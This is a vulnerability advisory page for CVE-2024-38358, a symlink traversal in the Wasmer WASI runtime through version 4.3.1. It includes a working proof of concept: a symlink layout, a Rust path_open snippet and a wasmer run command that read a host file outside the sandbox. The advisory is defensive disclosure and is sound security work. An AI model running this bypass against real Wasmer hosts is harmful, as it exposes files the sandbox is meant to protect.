GHSA-55F3-3QVG-8PV5

Vulnerability from github – Published: 2024-06-07 19:40 – Updated: 2024-06-20 14:14
VLAI?
Summary
Symlink bypasses filesystem sandbox
Details

Summary

If the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both oflags::creat and rights::fd_write. Programs can also crash the runtime by creating a symlink pointing outside with path_symlink and path_opening the link.

Details

PoC

Setup a filesystem as follows.

.
├── outside.file
└── preopen
    └── dir
        └── file -> ../../outside.file

Compile this Rust snippet with wasi v0.11 (for the preview1 API).

fn main() {
    unsafe {
        let filefd = wasi::path_open(
            5,
            wasi::LOOKUPFLAGS_SYMLINK_FOLLOW,
            "app/dir/file",
            wasi::OFLAGS_CREAT,
            wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE,
            0,
            0,
        )
        .unwrap();
        eprintln!("filefd: {filefd}");

        let mut buf = [0u8; 10];
        let iovs = [wasi::Iovec {
            buf: buf.as_mut_ptr(),
            buf_len: buf.len(),
        }];

        let read = wasi::fd_read(filefd, &iovs).unwrap();

        eprintln!("read {read}: {}", String::from_utf8_lossy(&buf));
    }
}

Run the compiled binary with Wasmer preopening preopen/:

wasmer run --mapdir /app:preopen a.wasm

This should not print the contents of the outside.file. Other runtimes like Wasmtime can successfully block this call. But Wasmer prints the contents of the file.

Severity ?
2.9 (Low)
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "wasmer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-38358"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-07T19:40:00Z",
    "nvd_published_at": "2024-06-19T20:15:11Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\nIf the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both `oflags::creat` and `rights::fd_write`. Programs can also crash the runtime by creating a symlink pointing outside with `path_symlink` and `path_open`ing the link.\n\n### Details\n\n\n\n### PoC\nSetup a filesystem as follows.\n\n```\n.\n\u251c\u2500\u2500 outside.file\n\u2514\u2500\u2500 preopen\n    \u2514\u2500\u2500 dir\n        \u2514\u2500\u2500 file -\u003e ../../outside.file\n```\n\nCompile this Rust snippet with `wasi` v0.11 (for the preview1 API).\n\n```rust\nfn main() {\n    unsafe {\n        let filefd = wasi::path_open(\n            5,\n            wasi::LOOKUPFLAGS_SYMLINK_FOLLOW,\n            \"app/dir/file\",\n            wasi::OFLAGS_CREAT,\n            wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE,\n            0,\n            0,\n        )\n        .unwrap();\n        eprintln!(\"filefd: {filefd}\");\n\n        let mut buf = [0u8; 10];\n        let iovs = [wasi::Iovec {\n            buf: buf.as_mut_ptr(),\n            buf_len: buf.len(),\n        }];\n\n        let read = wasi::fd_read(filefd, \u0026iovs).unwrap();\n\n        eprintln!(\"read {read}: {}\", String::from_utf8_lossy(\u0026buf));\n    }\n}\n```\n\nRun the compiled binary with Wasmer preopening `preopen/`:\n\n```\nwasmer run --mapdir /app:preopen a.wasm\n```\n\nThis should not print the contents of the `outside.file`. Other runtimes like Wasmtime can successfully block this call. But Wasmer prints the contents of the file.\n\n",
  "id": "GHSA-55f3-3qvg-8pv5",
  "modified": "2024-06-20T14:14:38Z",
  "published": "2024-06-07T19:40:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/wasmerio/wasmer/security/advisories/GHSA-55f3-3qvg-8pv5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38358"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wasmerio/wasmer/commit/b9483d022c602b994103f78ecfe46f017f8ac662"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/wasmerio/wasmer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Symlink bypasses filesystem sandbox"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.